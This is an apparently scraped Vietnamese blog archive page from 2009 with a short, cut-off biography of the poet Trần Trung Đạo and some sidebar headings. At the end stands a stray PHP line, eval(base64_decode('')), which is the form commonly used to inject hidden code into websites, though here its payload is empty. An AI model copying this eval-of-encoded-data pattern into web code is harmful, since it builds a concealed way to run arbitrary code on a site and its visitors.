Archive for December 29th, 2009

Tiểu Sử & Tác Phẩm

Trần Trung Ðạo quê quán Duy Xuyên Quảng Nam. Cựu học sinh Trung Học Duy Xuyên, Trung Học Trần Quí Cáp, Hội An. Cựu sinh viên Kinh Tế, Vạn Hạnh và Luật, Sài Gòn. Vượt biên bằng đường biển năm 1981, tạm trú tại trại Palawan, định cư tại

12.29.2009 | Thơ |

Comments Off on Tiểu Sử & Tác Phẩm

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>